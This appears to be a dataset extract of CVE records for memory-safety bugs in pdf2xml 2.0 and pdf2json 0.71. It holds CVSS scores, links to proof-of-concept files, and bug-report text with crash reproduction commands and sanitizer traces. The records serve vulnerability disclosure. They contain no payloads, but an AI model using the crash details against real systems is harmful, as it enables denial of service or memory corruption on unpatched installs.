{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"476"
] | 476 | https://github.com/kermitt2/pdf2xml/issues/10 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ gdb ./pdf2xml
(gdb) r 01-NULL-pointer-dereference-TextPage-restoreState test.xml
[00-NULL-pointer-dereference-TextPage-restoreState.pdf](https://github.com/kermitt2/pdf2xml/files/4876379/00-NULL-pointer-dereference-TextPage-restoreState.pdf)
Program received signal SIGSEGV, Segmentation fault.
0x00000000004... | NULL-pointer-dereference-TextPage-restoreState | https://api.github.com/repos/kermitt2/pdf2xml/issues/10/comments | 0 | 2020-07-06T01:52:41Z | 2020-07-06T01:52:41Z | https://github.com/kermitt2/pdf2xml/issues/10 | 651,195,343 | 10 | 2,772 |
CVE-2020-23873 | 2021-11-10T22:15:09.223 | pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::dump. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Technical Description"
],
"url": "https://cwe.mitre.org/data/definitions/122.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pd... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"787"
] | 787 | https://github.com/kermitt2/pdf2xml/issues/11 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ ./pdf2xml 01-Heap-buffer-overflow-TextPage-dump.pdf test.xml
=================================================================
==36659==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200004405a at pc 0x7fb7e473d9f5 bp 0x7ffc8a9d8c60 sp 0x7ffc8a9d83f0
WRITE of size 11 at 0x60200004405a thread T0
... | Heap-buffer-overflow-TextPage-dump | https://api.github.com/repos/kermitt2/pdf2xml/issues/11/comments | 0 | 2020-07-06T01:58:25Z | 2020-07-06T01:58:52Z | https://github.com/kermitt2/pdf2xml/issues/11 | 651,196,717 | 11 | 2,773 |
CVE-2020-23874 | 2021-11-10T22:15:09.370 | pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::addAttributsNode. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Technical Description"
],
"url": "https://cwe.mitre.org/data/definitions/122.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pd... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"787"
] | 787 | https://github.com/kermitt2/pdf2xml/issues/12 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ ./pdf2xml 02-Heap-buffer-overflow-addAttributsNode.pdf test.xml
=================================================================
==57105==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200004999a at pc 0x7f0869e219f5 bp 0x7fffaa6b3610 sp 0x7fffaa6b2da0
WRITE of size 12 at 0x60200004999a thread T0... | Heap-buffer-overflow-addAttributsNode | https://api.github.com/repos/kermitt2/pdf2xml/issues/12/comments | 0 | 2020-07-06T02:02:32Z | 2020-07-06T02:02:32Z | https://github.com/kermitt2/pdf2xml/issues/12 | 651,197,692 | 12 | 2,774 |
CVE-2020-23876 | 2021-11-10T22:15:09.447 | pdf2xml v2.0 was discovered to contain a memory leak in the function TextPage::testLinkedText. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"401"
] | 401 | https://github.com/kermitt2/pdf2xml/issues/14 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ ./pdf2xml 04-Memory leaks-TextPage-testLinkedText.pdf test.xml
=================================================================
==82085==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 99000 byte(s) in 99 object(s) allocated from:
#0 0x7f1554619602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.... | Memory-leaks-TextPage-testLinkedText | https://api.github.com/repos/kermitt2/pdf2xml/issues/14/comments | 0 | 2020-07-06T03:02:05Z | 2020-07-06T03:02:05Z | https://github.com/kermitt2/pdf2xml/issues/14 | 651,213,773 | 14 | 2,775 |
CVE-2020-23877 | 2021-11-10T22:15:09.567 | pdf2xml v2.0 was discovered to contain a stack buffer overflow in the component getObjectStream. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"787"
] | 787 | https://github.com/kermitt2/pdf2xml/issues/15 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ gdb ./pdf2xml
(gdb) r 05-Stack-buffer-overflow-XRef-getObjectStream.pdf test.xml
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Syntax Error (593163): Dictionary key must be a name object
Syntax Error (593170): Dictionary key must... | Stack-buffer-overflow-XRef-getObjectStream | https://api.github.com/repos/kermitt2/pdf2xml/issues/15/comments | 0 | 2020-07-06T03:05:26Z | 2020-07-06T03:05:26Z | https://github.com/kermitt2/pdf2xml/issues/15 | 651,214,682 | 15 | 2,776 |
CVE-2020-23878 | 2021-11-10T22:15:09.687 | pdf2json v0.71 was discovered to contain a stack buffer overflow in the component XRef::fetch. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/flexpa... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flowpaper:pdf2json:0.71:*:*:*:*:*:*:*",
"matchCriteriaId": "04335321-68D4-408C-A751-7CBE39D6F9FC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"787"
] | 787 | https://github.com/flexpaper/pdf2json/issues/45 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"flexpaper",
"pdf2json"
] | $ ./pdf2json 01-Stack-buffer-overflow-XRef-fetch.pdf
ASAN:SIGSEGV
=================================================================
==89368==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc9d6bcfe0 (pc 0x7f2cf5cba26e bp 0x000000000018 sp 0x7ffc9d6bcfd0 T0)
#0 0x7f2cf5cba26d (/usr/l... | Stack-buffer-overflow-XRef-fetch | https://api.github.com/repos/flexpaper/pdf2json/issues/45/comments | 0 | 2020-07-09T09:56:14Z | 2020-07-09T09:56:14Z | https://github.com/flexpaper/pdf2json/issues/45 | 653,929,593 | 45 | 2,777 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.